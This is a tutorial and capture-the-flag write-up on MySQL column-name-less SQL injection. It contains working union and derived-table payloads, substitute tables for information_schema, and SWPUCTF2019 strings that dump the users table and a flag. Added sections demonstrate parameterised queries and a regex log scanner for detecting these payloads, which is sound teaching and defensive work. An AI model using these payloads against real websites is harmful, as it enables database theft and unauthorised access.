References:
https://xz.aliyun.com/t/4105?accounttraceid=2d7e58f8845b4e41b53916c3cd3c4e13zwsd
https://upload-images.jianshu.io/upload_images/19476388-aa4e47166bb9e794.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240
http://www.pdsdt.lovepdsdt.com/index.php/2019/12/12/mysql/
Column-name-less injection
Use 1,2,3... in place of the unknown column names
You must first determine the number of columns in the table you are injecting into!!!
The rough idea: use 1,2,3... (as many as the table has columns) as the column names of a derived (temporary) table, then read the column you want back through 1,2,3.... Note that the derived table must be given an alias; here the alias is alias.
select `1` from (select 1,2,3,4 union select * from table_name)alias;
# when commas are filtered (join takes the place of the comma)
select a from (select * from (select 1 `a`)m join (select 2 `b`)n join (select 3 `c`)t where 0 union select * from table_name)alias;
# when backticks are filtered
select v from (select 1,2 as v,3 union select * from users)alias;
Using concat
Two columns can be queried in a single request.
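To show why the derived-table trick works and what stops it, here is an added example (not code from the original post) that runs the post's `2 as v` payload shape against an in-memory SQLite database standing in for the MySQL target. The `users` table, its rows and the three-column lookup query are constructed assumptions; SQLite accepts the same `union`/derived-table/`group_concat` syntax, so the mechanism carries over unchanged. The vulnerable lookup splices the input into the SQL text; the hardened one binds it as a parameter, so the same input is only ever compared as a string.

```python
import sqlite3

# Constructed sample data (assumption, not from the original post): a users
# table whose column names the outside world does not know, plus a flag-like row.
SAMPLE_ROWS = [
    (1, "admin", "adminpass"),
    (2, "flag", "flag{placeholder}"),
]

# The post's payload shape trimmed to the three columns of the lookup below.
# `2 as v` aliases the second column of the derived table so it can be read
# back without knowing its real name; the trailing quote is closed by the
# application's own closing quote, exactly as in the walkthrough payloads.
PAYLOAD = (
    "x' union select 1,"
    "(select group_concat(v) from (select 1,2 as v,3 union select * from users)c),'"
)


def make_db():
    """In-memory SQLite database standing in for the MySQL target."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users(id integer, name text, secret text)")
    conn.executemany("insert into users values (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, name):
    """Unsafe: the input is spliced into the SQL text, so the quote in the
    payload closes the literal and the remainder is parsed as a UNION."""
    sql = "select id, name, 3 from users where name = '%s'" % name
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """Hardened: placeholder binding. The payload is a plain string compared
    against name; it never becomes SQL syntax, so no rows match."""
    return conn.execute(
        "select id, name, 3 from users where name = ?", (name,)
    ).fetchall()


def leaked_values(rows):
    """Collect what the second result column carries, split on the commas
    that group_concat inserts between values."""
    out = set()
    for row in rows:
        if isinstance(row[1], str):
            out.update(row[1].split(","))
    return out


if __name__ == "__main__":
    conn = make_db()
    # The vulnerable path returns one UNION row whose second column holds
    # every value of the users table's second column (plus the dummy 2).
    print("vulnerable:", lookup_vulnerable(conn, PAYLOAD))
    # The parameterised path returns nothing for the same input.
    print("safe:      ", lookup_safe(conn, PAYLOAD))
```

The takeaway for a reviewer is that the number of columns, the alias and the `1,2,3` naming are all details of the injected SQL, not of the application; a bound parameter removes the whole class regardless of how cleverly the column names are avoided.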
Leaking column names with join (error-based)
select * from (select * from table_name as alias_a join table_name alias_b)alias_c; # the first column name appears in the error message
select * from (select * from table_name as alias_a join table_name alias_b using(column_1))alias_c; # the second
select * from (select * from table_name as alias_a join table_name alias_b using(column_1,column_2))alias_c; # the third
...
This method is not especially practical, though, because error messages are usually not echoed back to the client.
In practice
Tables that can replace information_schema:
schema_auto_increment_columns # only tables that have an auto-increment column appear here, so some tables may be missed
sys.schema_table_statistics_with_buffer
sys.x$schema_table_statistics_with_buffer
sys.innodb_buffer_stats_by_schema
sys.innodb_buffer_stats_by_table
mysql.innodb_table_stats
sys.schema_tables_with_full_table_scans
SWPUCTF2019: web1-easy-web
- Determine the column count
order by
It is often unusable because or is filtered; in that case group by can be used instead.
- Find the table name with this statement
1' union select 1,(select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'
- All values of the second column of the users table, joined together by group_concat with a comma between each value
1' union select 1,(select group_concat(a) from (select 1,2 as a,3 union select * from users)c),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'
- The second row turns out to be the flag, so dump the whole third column; the second value is the flag in md5-hashed form
1' union select 1,(select group_concat(b) from (select 1,2,3 as b union select * from users)c),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'
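From the detection side, the payloads above leave distinctive fingerprints that an ordinary `union select` rule does not look for: a `union` whose source is a parenthesised derived table, a `select 1,2 as x,3` style numeric column list (or the backtick-and-join variant), the `sys.*`/`mysql.*` stand-ins for information_schema, and `group by <n>` used to count columns. The following added example (not code from the original post) is a small scanner that URL-decodes the query string of constructed access-log lines and tags each with the signatures it matches; the log format, the IP addresses and the regexes are assumptions made for illustration, and two of the sample lines carry the walkthrough payloads shortened to four columns.

```python
import re
from urllib.parse import quote_plus, unquote_plus

# Signatures derived from the techniques on this page (assumed regexes for
# illustration; tune before using as a real detection rule).
SIGNATURES = {
    # union select ... from ( select ... ) : reading through a derived table
    "union_into_derived_table": re.compile(
        r"union\s+select\b.*?\bfrom\s*\(\s*select\b", re.I | re.S),
    # select 1,2 as x,3 / select 1,2,3 as x, or select 1 `a`)m join (comma-less form)
    "numeric_column_alias": re.compile(
        r"select\s+1\s*,\s*2\s*(as\s+\w+\s*)?,\s*3\b"
        r"|select\s+\d+\s+`\w+`\s*\)\s*\w+\s+join", re.I),
    # the information_schema substitutes listed on the page
    "info_schema_substitute": re.compile(
        r"\b(sys\.(x\$)?schema_table_statistics_with_buffer"
        r"|sys\.innodb_buffer_stats_by_(schema|table)"
        r"|mysql\.innodb_table_stats"
        r"|sys\.schema_tables_with_full_table_scans"
        r"|schema_auto_increment_columns)\b", re.I),
    # group by <number> used to count columns when 'or' (order by) is filtered
    "group_by_column_count": re.compile(r"\bgroup\s+by\s+\d+\b", re.I),
}

# Combined-log-style request line; only the request target is needed.
LOG_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"')


def extract_query(line):
    """Return the URL-decoded query string of a log line, or '' if none."""
    m = LOG_RE.search(line)
    if not m:
        return ""
    target = m.group(1)
    return unquote_plus(target.partition("?")[2])


def classify(line):
    """Names of all signatures that match the decoded query, sorted."""
    query = extract_query(line)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))


def scan(lines):
    """(1-based line number, matched signatures) for every flagged line."""
    findings = []
    for number, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            findings.append((number, hits))
    return findings


def log_line(ip, query):
    """Constructed access-log line (assumed format) with the id parameter
    URL-encoded the way a browser or tool would send it."""
    return ('%s - - [12/Dec/2019:10:00:00 +0800] '
            '"GET /index.php?id=%s HTTP/1.1" 200 512' % (ip, quote_plus(query)))


# Constructed sample log: benign traffic plus the walkthrough's payload shapes.
SAMPLE_LOG = [
    log_line("10.0.0.5", "1"),
    log_line("10.0.0.6", "1' group by 21 -- "),
    log_line("10.0.0.7",
             "1' union select 1,(select group_concat(table_name) from "
             "sys.schema_table_statistics_with_buffer where "
             "table_schema=database()),user(),4,'"),
    log_line("10.0.0.8",
             "1' union select 1,(select group_concat(a) from "
             "(select 1,2 as a,3 union select * from users)c),3,'"),
    log_line("10.0.0.9", "2 order by price"),
]


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print("line %d: %s" % (number, ", ".join(hits)))
```

Matching on the decoded query string matters here: every payload on this page is sent quoted, and the `(`, `'` and `,` characters the signatures depend on arrive as `%28`, `%27` and `%2C`. A WAF rule that only blocks `information_schema` misses the third line entirely, which is the point of the substitute tables listed above.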